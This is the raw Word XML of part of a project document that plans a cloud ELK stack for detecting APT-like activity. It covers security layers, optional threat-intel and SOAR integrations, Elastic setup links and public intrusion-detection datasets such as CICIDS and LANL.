      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="2387E0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9E8AE" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Integration Bridge</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B403115" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Secure data flow between local → cloud</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08A7AC41" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Beats output configuration in YAML</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="70A7FE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AD21C" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Backup Storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35EB42C1" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Store daily index snapshots</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D6CC400" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>S3 bucket / Google Cloud Storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="17B44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BD8B" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2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37788664" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Manage user roles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25C87EC6" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Kibana X-Pack Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="791F4981" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="1D2C1BC1">
          <v:rect id="_x0000_i1163" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4053D9D7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🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Security Layers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651"/>
      </w:tblGrid>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="184BD5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8F03C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C85138C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Protection Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="6FA6ED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9674A" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Transport Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B0C3DAE" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>SSL/TLS between Beats → Logstash → Elasticsearch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="68014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47F8" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Access Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5004ECE7" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Username/Password, Token-based API</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="7F803C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ACDAA" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Network Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0070B945" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Firewall rules to restrict open ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="6A0165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26E36" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Data Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="736AF9E3" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Encrypted indices (AES256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="4EFD07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D49C9" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Monitoring Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77248486" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Alerts for failed logins, DoS spikes, or tampering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C059AF3" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="403170D6">
          <v:rect id="_x0000_i1164" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1652D0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🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Bonus: Optional Integrations (For Extra Innovation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4029"/>
        <w:gridCol w:w="2831"/>
      </w:tblGrid>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="6D9EC5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3DD0B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CF39C8E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C9B7D8" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="31F7D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C3017" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Threat Intel Enrichment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="119DEC27" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Compare incoming IPs with known threat lists</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72794924" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve">AlienVault OTX, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004536D2">
              <w:t>AbuseIPDB</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve"> API</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="2DFC4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DE464" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Auto-Mitigate via SOAR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D7F8D9E" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Run scripts to block malicious IPs automatically</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0168D692" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004536D2">
              <w:t>TheHive</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve"> + Cortex</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="2539A9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AC930" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>AI Rule Enhancement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58850CB7" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Add transformer-based anomaly detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0345BB93" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve">BERT / </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004536D2">
              <w:t>RoBERTa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve"> fine-tuning later</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="3AD282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6EE6A" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Visualization Add-On</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46652289" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Interactive heatmap of APT events</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30EACD4B" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Kibana Vega plugin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38F1A48E" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="43C2A4A6">
          <v:rect id="_x0000_i1165" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2942B580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📡</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Deployment References and Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F39C823" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Elastic Cloud Setup:</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔗</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId83" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004536D2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/cloud/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="66BFE258" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Beats + Logstash Config Tutorial:</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔗</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId84" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004536D2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/beats/libbeat/current/beats-reference.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6A5B3F14" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Secure Data Flow (TLS + Auth):</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔗</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId85" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004536D2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/elasticsearch/reference/current/security-settings.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="498FDECC" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Deploy with Docker Compose:</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔗</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId86" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004536D2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/elastic-stack-get-started/current/get-started-docker.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F630D9B" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="1D334528">
          <v:rect id="_x0000_i1166" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="060DB074" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🏁</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> End Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56370E02" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t>After implementing this deployment architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19214197" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">All endpoints continuously send logs to a </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>central cloud ELK cluster</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDDEFAF" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">Threat detection rules </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>identify and alert</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> suspicious APT-like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C40DE64" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">Security teams </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>view real-time dashboards and alerts</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> from any location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA0B004" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">The system remains </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>scalable, modular, and easy to maintain</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D90970E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📚</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Comprehensive References for APT Log Sources &amp; Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFFD6D7" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
      <w:r w:rsidRPr="00381682">
        <w:pict w14:anchorId="1F518D3B">
          <v:rect id="_x0000_i1281" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E1DF61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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. CIC IDS Datasets (CICIDS2017 / CICIDS2018 / CSE-CIC-IDS2018)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F436E05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Realistic, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00381682">
        <w:t>labeled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> network attack traffic (DoS, infiltration, brute force, web attacks, etc.)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Suricata/Zeek → ELK ingestion → detection rule creation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Link:</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId87" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00381682">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.unb.ca/cic/datasets/ids-2017.html</w:t>
        </w:r>
      </w:hyperlink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Alternative Mirror (CSE-CIC-IDS2018):</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> https://www.unb.ca/cic/datasets/cse-cic-ids2018.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E0913B" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
      <w:r w:rsidRPr="00381682">
        <w:pict w14:anchorId="16A3D320">
          <v:rect id="_x0000_i1282" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A304EFD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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. LANL (Los Alamos National Laboratory) Cyber Security Datasets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A530F7C" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> Massive enterprise-scale authentication, process, and network logs from a real network (anonymized).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Detecting lateral movement, credential misuse, brute force attacks, insider threats.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Link:</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> https://csr.lanl.gov/data/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Direct Auth Dataset:</w:t>
      </w:r>
